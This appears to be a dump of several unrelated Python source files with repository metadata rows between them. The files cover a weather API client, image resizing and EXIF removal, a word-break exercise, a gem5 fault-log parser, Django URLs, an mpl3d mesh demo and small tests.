args.resultpath = savepath +'results/run_'+str(args.run)+'/'
args.modelpath = savepath+'/models/run_'+str(args.run)+'/'
if args.dataset == 'mnist':
args.num_users = 150
args.num_classes = 10
else:
args.num_users = 0
args.num_classes = 0
if not os.path.isdir(args.resultpath):
os.makedirs(args.resultpath)
if not os.path.isdir(args.modelpath):
os.makedirs(args.modelpath)
# saving args as dict
torch.save(vars(args), args.resultpath+'args_'+str(args.niid_degree)+'.pt')
print("Algo: {} | No. local epochs: {} | No. of communication round: {} | Dataset: {} | Model: {}\nDegree of Non-IID-ness: {} | No. users: {} | Client selection fraction: {}".format(args.algo, args.loc_epoch, args.round, args.dataset, args.model, args.niid_degree, args.num_users, args.frac))
return args
if __name__ == "__main__":
args = args_parser()
server_coordination(args)
time.sleep(20)
| 44.115385 | 297 | 0.648794 | 987 | 6,882 | 4.372847 | 0.237082 | 0.037535 | 0.070899 | 0.031279 | 0.200185 | 0.145505 | 0.101019 | 0.07785 | 0.060241 | 0.060241 | 0 | 0.010173 | 0.200087 | 6,882 | 155 | 298 | 44.4 | 0.773842 | 0.021651 | 0 | 0.123967 | 0 | 0.008264 | 0.171696 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.024793 | false | 0 | 0.14876 | 0 | 0.190083 | 0.024793 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b9bae125e13deb3ca6f4383bdd93263a6ff8361 | 2,398 | py | Python | weather/forecast.py | Shom770/weather_usa | 4e925c4eb7fbbc444a27f2969d342335dae5ea83 | [
"MIT"
] | null | null | null | weather/forecast.py | Shom770/weather_usa | 4e925c4eb7fbbc444a27f2969d342335dae5ea83 | [
"MIT"
] | null | null | null | weather/forecast.py | Shom770/weather_usa | 4e925c4eb7fbbc444a27f2969d342335dae5ea83 | [
"MIT"
] | null | null | null | from __future__ import annotations
import asyncio
import aiohttp
from datetime import datetime
class Forecast:
def __init__(self, totals: dict, grid_x: int, grid_y: int, cwa: str, city: str, state: str):
self.totals = totals
self.simplified_dict = {key: '...' for key in totals.keys()}
self.grid_x, self.grid_y = grid_x, grid_y
self.city, self.state = city, state
self.cwa = cwa
def __repr__(self):
return f"Forecast(totals={self.simplified_dict}, grid_x={self.grid_x}, grid_y={self.grid_y}," \
f" cwa={self.cwa}, city={self.city}, state={self.state})"
def forecast(latitude: float, longitude: float) -> list[Forecast]:
"""Main function for retrieving forecast for a longitude and latitude"""
loop = asyncio.get_event_loop()
*information, request = loop.run_until_complete(_get_gridpoint(latitude, longitude))
res = loop.run_until_complete(_get_forecast(request))
return Forecast(totals=res, grid_x=information[0], grid_y=information[1],
cwa=information[2], city=information[3], state=information[4])
async def _get_gridpoint(latitude: float, longitude: float) -> tuple[int, int, str, str, str, str]:
async with aiohttp.ClientSession() as session:
async with session.get(f"https://api.weather.gov/points/{latitude},{longitude}") as response:
response = await response.json()
response = response['properties']
return response['gridX'], response['gridY'], response['gridId'], \
response['relativeLocation']['properties']['city'], \
response['relativeLocation']['properties']['state'], \
response['forecastGridData']
async def _get_forecast(url: str) -> Forecast:
async with aiohttp.ClientSession() as session:
async with session.get(url) as response:
response = await response.json()
response = response['properties']
totals = {}
for key, val in zip(list(response.keys())[8:], list(response.values())[8:]):
if isinstance(val, dict):
totals[key] = {}
for time_dct in val['values']:
time = time_dct['validTime'].split('/')[0]
totals[key][datetime.fromisoformat(time)] = time_dct['value']
return totals | 46.115385 | 103 | 0.621351 | 282 | 2,398 | 5.131206 | 0.308511 | 0.020733 | 0.01244 | 0.033172 | 0.214236 | 0.163096 | 0.163096 | 0.163096 | 0.163096 | 0.078784 | 0 | 0.00442 | 0.245204 | 2,398 | 52 | 104 | 46.115385 | 0.795028 | 0.027523 | 0 | 0.142857 | 0 | 0 | 0.140524 | 0.034809 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.095238 | 0.02381 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b9d5e37aaae1696ad5a8c3f64abcd5dca15ddbc | 1,170 | py | Python | bunny.py | querciak/matplotlib-3d | 8d361b861f33b1133fcf304a2e397769797ef1d3 | [
"BSD-2-Clause"
] | 242 | 2020-03-26T11:36:21.000Z | 2022-03-10T01:57:54.000Z | bunny.py | mikepsn/matplotlib-3d | 538d514e7fd11843f5a338a52b5887c3f16a9bff | [
"BSD-2-Clause"
] | 6 | 2020-03-30T18:20:09.000Z | 2021-01-26T20:16:07.000Z | bunny.py | mikepsn/matplotlib-3d | 538d514e7fd11843f5a338a52b5887c3f16a9bff | [
"BSD-2-Clause"
] | 31 | 2020-03-29T01:55:55.000Z | 2022-03-29T12:52:14.000Z | # -----------------------------------------------------------------------------
# Copyright (c) 2020 Nicolas P. Rougier. All rights reserved.
# Distributed under the (new) BSD License.
# -----------------------------------------------------------------------------
# This example shows how to display a mesh
# -----------------------------------------------------------------------------
import numpy as np
from mpl3d import glm
from mpl3d.mesh import Mesh
from mpl3d.camera import Camera
import meshio
# --- main --------------------------------------------------------------------
if __name__ == "__main__":
import matplotlib.pyplot as plt
fig = plt.figure(figsize=(4,4))
ax = fig.add_axes([0,0,1,1], xlim=[-1,+1], ylim=[-1,+1], aspect=1)
ax.axis("off")
camera = Camera("ortho", scale=2)
mesh = meshio.read("data/bunny.obj")
vertices = mesh.points
faces = mesh.cells[0].data
vertices = glm.fit_unit_cube(vertices)
mesh = Mesh(ax, camera.transform, vertices, faces,
cmap=plt.get_cmap("magma"), edgecolors=(0,0,0,0.25))
camera.connect(ax, mesh.update)
plt.savefig("bunny.png", dpi=600)
plt.show()
| 36.5625 | 79 | 0.486325 | 133 | 1,170 | 4.18797 | 0.593985 | 0.014363 | 0.010772 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.029116 | 0.148718 | 1,170 | 31 | 80 | 37.741935 | 0.53012 | 0.387179 | 0 | 0 | 0 | 0 | 0.062059 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.3 | 0 | 0.3 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b9d6d92851d5c526612bcafb989ae5b804d21b9 | 1,193 | py | Python | Backend/resize.py | tfederico/WatsonInnovation | 22a7bf28c4a110f2af0d45c77fa7971f3d0f9647 | [
"MIT"
] | null | null | null | Backend/resize.py | tfederico/WatsonInnovation | 22a7bf28c4a110f2af0d45c77fa7971f3d0f9647 | [
"MIT"
] | null | null | null | Backend/resize.py | tfederico/WatsonInnovation | 22a7bf28c4a110f2af0d45c77fa7971f3d0f9647 | [
"MIT"
] | null | null | null | import os, sys
from PIL import Image
import argparse
from os import listdir
from os.path import isfile, join
if __name__ == '__main__':
maxheigth = 320
maxwidth = 320
parser = argparse.ArgumentParser(description='Cleaning files that are too big.')
parser.add_argument('-dir', '--d', help="Directory name", required=True)
args = parser.parse_args()
directory = args.d
directory = "res/images/"+directory
print(directory)
onlyfiles = [f for f in listdir(directory) if isfile(join(directory, f)) and not ".zip" in f]
resizedDir = directory+"/resized"
if not os.path.exists(resizedDir):
os.makedirs(resizedDir)
for f in onlyfiles:
try:
img = Image.open(directory+"/"+f)
width, heigth = img.size
ratio = min(maxwidth/float(width),maxheigth/float(heigth))
if ratio < 1:
size = ratio*width, ratio*heigth
img.thumbnail(size, Image.ANTIALIAS)
img.save(resizedDir+"/"+f)
os.rename(resizedDir+"/"+f, directory+"/"+f)
except IOError:
print("cannot create thumbnail for '%s'" % f)
os.rmdir(resizedDir)
| 33.138889 | 97 | 0.615256 | 145 | 1,193 | 4.993103 | 0.482759 | 0.041436 | 0.016575 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007973 | 0.26404 | 1,193 | 35 | 98 | 34.085714 | 0.816629 | 0 | 0 | 0 | 0 | 0 | 0.100587 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.16129 | 0 | 0.16129 | 0.064516 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5ba08622224ba72fb67b9d3ea638e78dc27e3b06 | 1,543 | py | Python | Solutions/022.py | ruppysuppy/Daily-Coding-Problem-Solutions | 37d061215a9af2ce39c51f8816c83039914c0d0b | [
"MIT"
] | 70 | 2021-03-18T05:22:40.000Z | 2022-03-30T05:36:50.000Z | Solutions/022.py | ungaro/Daily-Coding-Problem-Solutions | 37d061215a9af2ce39c51f8816c83039914c0d0b | [
"MIT"
] | null | null | null | Solutions/022.py | ungaro/Daily-Coding-Problem-Solutions | 37d061215a9af2ce39c51f8816c83039914c0d0b | [
"MIT"
] | 30 | 2021-03-18T05:22:43.000Z | 2022-03-17T10:25:18.000Z | """
Problem:
Given a dictionary of words and a string made up of those words (no spaces), return the
original sentence in a list. If there is more than one possible reconstruction, return
any of them. If there is no possible reconstruction, then return null.
For example, given the set of words 'quick', 'brown', 'the', 'fox', and the string
"thequickbrownfox", you should return ['the', 'quick', 'brown', 'fox'].
Given the set of words 'bed', 'bath', 'bedbath', 'and', 'beyond', and the string
"bedbathandbeyond", return either ['bed', 'bath', 'and', 'beyond] or
['bedbath', 'and', 'beyond'].
"""
from typing import List
def get_sentence_split(word_list: List[str], string: str) -> List[str]:
word_set = set()
buffer = ""
words_found = []
# populating the set with the words for O(1) access
for word in word_list:
word_set.add(word)
# searching for words in the string
for char in string:
buffer += char
if buffer in word_set:
words_found.append(buffer)
buffer = ""
if len(words_found) == 0:
return None
return words_found
if __name__ == "__main__":
print(get_sentence_split(["quick", "brown", "the", "fox"], "thequickbrownfox"))
print(
get_sentence_split(
["bed", "bath", "bedbath", "and", "beyond"], "bedbathandbeyond"
)
)
print(get_sentence_split(["quick", "brown", "the", "fox"], "bedbathandbeyond"))
"""
SPECS:
TIME COMPLEXITY: O(characters_in_input_string)
SPACE COMPLEXITY: O(words)
"""
| 28.574074 | 87 | 0.6442 | 206 | 1,543 | 4.68932 | 0.378641 | 0.041408 | 0.066253 | 0.049689 | 0.161491 | 0.076605 | 0.076605 | 0.076605 | 0 | 0 | 0 | 0.00166 | 0.219054 | 1,543 | 53 | 88 | 29.113208 | 0.8 | 0.438756 | 0 | 0.086957 | 0 | 0 | 0.144531 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043478 | false | 0 | 0.043478 | 0 | 0.173913 | 0.130435 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5ba1f94b481fd67f37cb2f9937fc57e408770c9f | 2,872 | py | Python | scripts/jpg_exif_remove/jpg_exif_remove.py | jimholdaway/pythonista | f0621e4043a1c1aa7c37bae363ae0852fb54a1ec | [
"MIT"
] | null | null | null | scripts/jpg_exif_remove/jpg_exif_remove.py | jimholdaway/pythonista | f0621e4043a1c1aa7c37bae363ae0852fb54a1ec | [
"MIT"
] | null | null | null | scripts/jpg_exif_remove/jpg_exif_remove.py | jimholdaway/pythonista | f0621e4043a1c1aa7c37bae363ae0852fb54a1ec | [
"MIT"
] | null | null | null | import sys
import argparse
import os
import piexif
from PIL import Image
def jpg_exif_remove(args):
"""
Removes EXIF data from directory of jpeg images whilst preserving image orientation and quality.
Parameters
----------
in_dir: string, directory containing jpgs to have EXIF removed, default 'images'
out_dir: string, destination directory of cleaned jpgs, default 'images_cleaned'
abs_path: boolean, if True in_dir and out_dir must be full absolute paths
"""
# Set args
in_dir = args.in_dir
out_dir = args.out_dir
abs_path = args.abs_path
# Set paths according to arg boolean
if (abs_path == True):
in_path = in_dir
out_path = out_dir
elif (abs_path == False):
in_path = os.getcwd() + "/" + in_dir + "/"
out_path = os.getcwd() + "/" + out_dir + "/"
else:
print("Option 'abs_path' must be boolean")
# Check if output path exists, create if not
try:
if not os.path.exists(os.path.dirname(out_path)):
os.makedirs(os.path.dirname(out_path))
except OSError as e:
if e.errno != errno.EEXIST:
raise
# Loop through files in input path directory
for filename in os.listdir(in_path):
img = Image.open(in_path + filename)
# Check if image has EXIF data
if "exif" in img.info:
exif_dict = piexif.load(img.info["exif"])
# Check if EXIF data has orientation entry
if piexif.ImageIFD.Orientation in exif_dict["0th"]:
orientation = exif_dict["0th"].pop(piexif.ImageIFD.Orientation)
# Rotate according to orientation entry
if orientation == 2:
img = img.transpose(Image.FLIP_LEFT_RIGHT)
elif orientation == 3:
img = img.rotate(180)
elif orientation == 4:
img = img.rotate(180).transpose(Image.FLIP_LEFT_RIGHT)
elif orientation == 5:
img = img.rotate(-90, expand=True).transpose(Image.FLIP_LEFT_RIGHT)
elif orientation == 6:
img = img.rotate(-90, expand=True)
elif orientation == 7:
img = img.rotate(90, expand=True).transpose(Image.FLIP_LEFT_RIGHT)
elif orientation == 8:
img = img.rotate(90, expand=True)
# Save image without EXIF, with max useful quality, no subsampling
img.save(out_path + filename, quality = 95, subsampling = 0)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Open JPEGs in a directory, removes EXIF data and saves to another directory. If default arguments are not used, ALL arguments must be set.")
parser.add_argument("in_dir", nargs='?', type=str, default="images", help="Path to directory of images to have EXIF removed")
parser.add_argument("out_dir", nargs='?', type=str, default="images_cleaned", help="Path of directory to save EXIF removed images too")
parser.add_argument("abs_path", nargs='?', type=bool, default=False, help="Set to true is absolute path to be used")
args = parser.parse_args()
jpg_exif_remove(args)
| 31.217391 | 187 | 0.69812 | 425 | 2,872 | 4.578824 | 0.317647 | 0.017986 | 0.036999 | 0.045221 | 0.184995 | 0.16444 | 0.110997 | 0.067831 | 0.067831 | 0.067831 | 0 | 0.011202 | 0.191852 | 2,872 | 91 | 188 | 31.56044 | 0.82723 | 0.230153 | 0 | 0 | 0 | 0.019608 | 0.172382 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.019608 | false | 0 | 0.098039 | 0 | 0.117647 | 0.019608 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5ba302171ec86e6e932c808425569cf399e3d09e | 385 | py | Python | boiler/__init__.py | rudineirk/faculdade_boiler | 9e796d8c2603f37799fc02dc7bd01827b28164df | [
"MIT"
] | null | null | null | boiler/__init__.py | rudineirk/faculdade_boiler | 9e796d8c2603f37799fc02dc7bd01827b28164df | [
"MIT"
] | null | null | null | boiler/__init__.py | rudineirk/faculdade_boiler | 9e796d8c2603f37799fc02dc7bd01827b28164df | [
"MIT"
] | null | null | null | from .conn import BoilerConn
from .controller import WaterColumnController, WaterTempController
from .core import Main
from .reader import WaterColumnReader, WaterTempReader
__all__ = [
'BoilerConn',
'WaterColumnController',
'WaterTempController',
'WaterColumnReader',
'WaterTempReader',
'Main',
]
if __name__ == "__main__":
main = Main()
main.run()
| 20.263158 | 66 | 0.716883 | 32 | 385 | 8.25 | 0.5 | 0.090909 | 0.090909 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.184416 | 385 | 18 | 67 | 21.388889 | 0.840764 | 0 | 0 | 0 | 0 | 0 | 0.244156 | 0.054545 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.266667 | 0 | 0.266667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5ba6095505bab7a365504562e670632218328c79 | 2,462 | py | Python | fault_generator.py | Jihaoyun/gem5 | c52195e8304b5571008eab050fc9cc38ba91107c | [
"BSD-3-Clause"
] | null | null | null | fault_generator.py | Jihaoyun/gem5 | c52195e8304b5571008eab050fc9cc38ba91107c | [
"BSD-3-Clause"
] | null | null | null | fault_generator.py | Jihaoyun/gem5 | c52195e8304b5571008eab050fc9cc38ba91107c | [
"BSD-3-Clause"
] | null | null | null | import os
import argparse
parser = argparse.ArgumentParser(description = 'gem5 with fault injection')
parser.add_argument('-log', '--log-file', type = str, dest = 'logFile',
help = 'The input file of debug info of Gem5 simulator')
parser.add_argument('-in', '--input-fault', type = str, dest = 'faultFile',
help = 'The input file of faults')
parser.add_argument('-out', '--output-fault', type = str, dest = 'newFaultFile',
help = 'The output file of faults')
args = parser.parse_args()
class FaultEntry:
def __init__(self, stuckBit, category, reg, bitPosition, tick):
self.stuckBit = stuckBit
self.category = category
self.reg = reg
self.bitPosition = bitPosition
self.tick = tick
class RegFaultGenerator:
def __init__(self, filename):
try:
self.file = open(filename, "r")
except IOError:
raise
def setFault(self, stuckBit, category, reg, bitPosition, tick):
self.fault = FaultEntry(stuckBit, category, reg, bitPosition, tick)
def haveNext(self):
self.nextLine = self.file.readline().strip()
if self.nextLine == "":
return False
return True
def next(self):
currentLine = self.nextLine.replace(" ","").split(":")
if currentLine[2] == "PseudoInst" and currentLine[4] == "rpns()":
if eval(currentLine[0]) < eval(self.fault.tick):
faultLine = ",".join([self.fault.stuckBit, self.fault.category, self.fault.reg,\
self.fault.bitPosition, currentLine[0], currentLine[0]])
return faultLine
return ""
class FaultParser:
def __init__(self, filename):
try:
self.file = open(filename, "r")
except IOError:
raise
def haveNext(self):
self.nextLine = self.file.readline().strip()
if self.nextLine == "":
return False
if self.nextLine[0] == '#':
return False
return True
def next(self):
currentLine = self.nextLine.replace(" ","")
entries = currentLine.split(",")
return FaultEntry(entries[0], entries[1], entries[2], entries[3], entries[4])
if __name__ == '__main__':
newFaultFP = open(args.newFaultFile, "w")
faultFP = FaultParser(args.faultFile)
lineLabel = 0
while faultFP.haveNext():
fault = faultFP.next()
logFP = RegFaultGenerator(args.logFile)
logFP.setFault(fault.stuckBit, fault.category, fault.reg, fault.bitPosition, fault.tick)
while logFP.haveNext():
newLine = logFP.next()
if not newLine == "":
newFaultFP.write("FAULT" + str(lineLabel) + ":" + newLine + "\n")
lineLabel = lineLabel + 1
newFaultFP.close() | 26.191489 | 90 | 0.68156 | 301 | 2,462 | 5.495017 | 0.299003 | 0.050786 | 0.030834 | 0.054414 | 0.325272 | 0.28295 | 0.28295 | 0.232164 | 0.232164 | 0.232164 | 0 | 0.007324 | 0.168156 | 2,462 | 94 | 91 | 26.191489 | 0.800293 | 0 | 0 | 0.333333 | 0 | 0 | 0.096224 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.115942 | false | 0 | 0.028986 | 0 | 0.304348 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5ba7b4142e2df3a12d460152b808e2562e69558e | 1,362 | py | Python | src/testproject/urls.py | DramaFever/sst | 63d41a102c9d3bdb54019f28a93cff0314a0214f | [
"Apache-2.0"
] | 4 | 2015-01-21T22:20:50.000Z | 2017-12-18T11:38:16.000Z | src/testproject/urls.py | DramaFever/sst | 63d41a102c9d3bdb54019f28a93cff0314a0214f | [
"Apache-2.0"
] | 63 | 2015-01-13T19:32:06.000Z | 2020-04-22T17:01:03.000Z | src/testproject/urls.py | wbdl/sst | 7a2805391fdd390ecb0f488f8377f58381358c89 | [
"Apache-2.0"
] | null | null | null | from django.conf.urls import include, patterns
from django.conf import settings
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
# Example:
# (r'^testproject/', include('testproject.foo.urls')),
(r'^static-files/(?P<path>.*)$',
'django.views.static.serve',
{'document_root': settings.STATIC_DOC_ROOT}),
(r'simple', include('testproject.simple.urls')),
(r'begin', 'simple.views.begin'),
(r'longscroll', 'simple.views.longscroll'),
(r'html5', 'simple.views.html5'),
(r'popup', 'simple.views.popup'),
(r'frame_a', 'simple.views.frame_a'),
(r'frame_b', 'simple.views.frame_b'),
(r'alerts', 'simple.views.alerts'),
(r'yui', 'simple.views.yui'),
(r'tables', 'simple.views.tables'),
(r'page_to_save', 'simple.views.page_to_save'),
(r'kill_django', 'simple.views.kill_django'),
(r'', 'simple.views.index'),)
urlpatterns += staticfiles_urlpatterns()
| 43.935484 | 77 | 0.501468 | 129 | 1,362 | 5.178295 | 0.325581 | 0.197605 | 0.041916 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002268 | 0.352423 | 1,362 | 30 | 78 | 45.4 | 0.755102 | 0.044787 | 0 | 0 | 0 | 0 | 0.3151 | 0.113251 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.173913 | 0 | 0.173913 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5ba819e5829f91fab4b95f7e26b1d2411684036a | 2,017 | py | Python | mmxai/interpretability/classification/torchray/extremal_perturbation/torchray_mmf.py | yongkangzzz/mmfgroup | 098a78c83e1c2973dc895d1dc7fd30d7d3668143 | [
"MIT"
] | null | null | null | mmxai/interpretability/classification/torchray/extremal_perturbation/torchray_mmf.py | yongkangzzz/mmfgroup | 098a78c83e1c2973dc895d1dc7fd30d7d3668143 | [
"MIT"
] | null | null | null | mmxai/interpretability/classification/torchray/extremal_perturbation/torchray_mmf.py | yongkangzzz/mmfgroup | 098a78c83e1c2973dc895d1dc7fd30d7d3668143 | [
"MIT"
] | null | null | null | from mmxai.interpretability.classification.torchray.extremal_perturbation.multimodal_extremal_perturbation import *
from mmf.models.mmbt import MMBT
from mmf.models.fusions import LateFusion
from mmf.models.vilbert import ViLBERT
from mmf.models.visual_bert import VisualBERT
from PIL import Image
def torchray_multimodal_explain(image_name, text, model):
print(image_name)
print(text)
image_path = "static/" + image_name
image = Image.open(image_path)
width, height = image.size
image_tensor = image2tensor(image_path)
image_tensor = image_tensor.to((torch.device(
"cuda:0" if torch.cuda.is_available() else "cpu")))
mask_, hist_, output_tensor, summary, conclusion = multi_extremal_perturbation(model,
image_tensor,
image_path,
text,
0,
reward_func=contrastive_reward,
debug=True,
areas=[0.12])
# summary is a higher level explanation in terms of sentence
# conclusion is a list that contains words and their weights
# output_tensor is the masked image
image_tensor = output_tensor.to("cpu")
PIL_image = transforms.ToPILImage()(
imsc(image_tensor[0], quiet=False)[0]).convert("RGB")
PIL_image = PIL_image.resize((width, height), Image.ANTIALIAS)
name_split_list = image_name.split('.')
exp_image = name_split_list[0] + '_torchray.' + name_split_list[1]
PIL_image.save("static/" + exp_image)
print(summary)
return conclusion, exp_image
| 46.906977 | 115 | 0.531482 | 196 | 2,017 | 5.244898 | 0.44898 | 0.064202 | 0.050584 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008251 | 0.399108 | 2,017 | 42 | 116 | 48.02381 | 0.839934 | 0.074864 | 0 | 0 | 0 | 0 | 0.021482 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.03125 | false | 0 | 0.1875 | 0 | 0.25 | 0.09375 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5ba864287e43b24a6ee51f736ea3dfbb9bf7e4ff | 812 | py | Python | tests/test_json.py | GarrettMooney/moonpy | 8e44f7afa2daccac6f2b2c089f272b95e4ba2945 | [
"MIT"
] | null | null | null | tests/test_json.py | GarrettMooney/moonpy | 8e44f7afa2daccac6f2b2c089f272b95e4ba2945 | [
"MIT"
] | null | null | null | tests/test_json.py | GarrettMooney/moonpy | 8e44f7afa2daccac6f2b2c089f272b95e4ba2945 | [
"MIT"
] | null | null | null | import pytest
from .util import make_tempdir
from moonpy.util import json_dumps, read_json
def test_json_dumps_sort_keys(data):
result = json_dumps(data["data"], sort_keys=True)
assert result == data["sorted_file_contents"]
def test_read_json_file(data):
with make_tempdir({data["file_name"]: data["file_contents"]}) as temp_dir:
file_path = temp_dir / data["file_name"]
assert file_path.exists()
data = read_json(file_path)
assert len(data) == 1
assert data["hello"] == "world"
def test_read_json_file_invalid(data):
with make_tempdir({data["file_name"]: data["invalid_file_contents"]}) as temp_dir:
file_path = temp_dir / data["file_name"]
assert file_path.exists()
with pytest.raises(ValueError):
read_json(file_path)
| 30.074074 | 86 | 0.694581 | 117 | 812 | 4.487179 | 0.299145 | 0.091429 | 0.091429 | 0.057143 | 0.464762 | 0.392381 | 0.392381 | 0.392381 | 0.259048 | 0.259048 | 0 | 0.00152 | 0.189655 | 812 | 26 | 87 | 31.230769 | 0.796353 | 0 | 0 | 0.210526 | 0 | 0 | 0.128079 | 0.025862 | 0 | 0 | 0 | 0 | 0.263158 | 1 | 0.157895 | false | 0 | 0.157895 | 0 | 0.315789 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5ba92f0037540c51b246e7074e898854f1450755 | 869 | py | Python | 2016/python/d10.py | eduellery/adventofcode | dccece0bf59bc241803edc99a6536062fe2714d1 | [
"MIT"
] | null | null | null | 2016/python/d10.py | eduellery/adventofcode | dccece0bf59bc241803edc99a6536062fe2714d1 | [
"MIT"
] | null | null | null | 2016/python/d10.py | eduellery/adventofcode | dccece0bf59bc241803edc99a6536062fe2714d1 | [
"MIT"
] | null | null | null | import re, collections
bot = collections.defaultdict(list)
output = collections.defaultdict(list)
values = open('d10.in').read().splitlines()
pipeline = {}
for value in values:
if value.startswith('value'):
n, b = map(int, re.findall(r'-?\d+', value))
bot[b].append(n)
elif value.startswith('bot'):
who, n1, n2 = map(int, re.findall(r'-?\d+', value))
t1, t2 = re.findall(r' (bot|output)', value)
pipeline[who] = (t1, n1), (t2, n2)
while bot:
for k, v in dict(bot).items():
if len(v) == 2:
v1, v2 = sorted(bot.pop(k))
if v1 == 17 and v2 == 61:
p1 = k
(t1, n1), (t2, n2) = pipeline[k]
eval(t1)[n1].append(v1)
eval(t2)[n2].append(v2)
a, b, c = (output[k][0] for k in [0, 1, 2])
p2 = a * b * c
print('P1:', p1)
print('P2:', p2)
| 24.138889 | 59 | 0.514384 | 132 | 869 | 3.386364 | 0.409091 | 0.060403 | 0.067114 | 0.067114 | 0.098434 | 0.098434 | 0.098434 | 0 | 0 | 0 | 0 | 0.063005 | 0.287687 | 869 | 35 | 60 | 24.828571 | 0.659128 | 0 | 0 | 0 | 0 | 0 | 0.049482 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.038462 | 0 | 0.038462 | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5bab74b4a30cd2de20b8b06675475d7ebf4ce3d0 | 6,063 | py | Python | datasets/synthetic_iam.py | IHR-Nom/Full_Page_Recognition | 27899ece69e328e8d40a8cf5214a77a6ab8aef35 | [
"Apache-2.0"
] | null | null | null | datasets/synthetic_iam.py | IHR-Nom/Full_Page_Recognition | 27899ece69e328e8d40a8cf5214a77a6ab8aef35 | [
"Apache-2.0"
] | null | null | null | datasets/synthetic_iam.py | IHR-Nom/Full_Page_Recognition | 27899ece69e328e8d40a8cf5214a77a6ab8aef35 | [
"Apache-2.0"
] | null | null | null | import glob
from torch.utils.data import Dataset
import torchvision.transforms.functional as TF
import torchvision as tv
import xml.etree.ElementTree as ET
from PIL import Image
import numpy as np
import random
import os
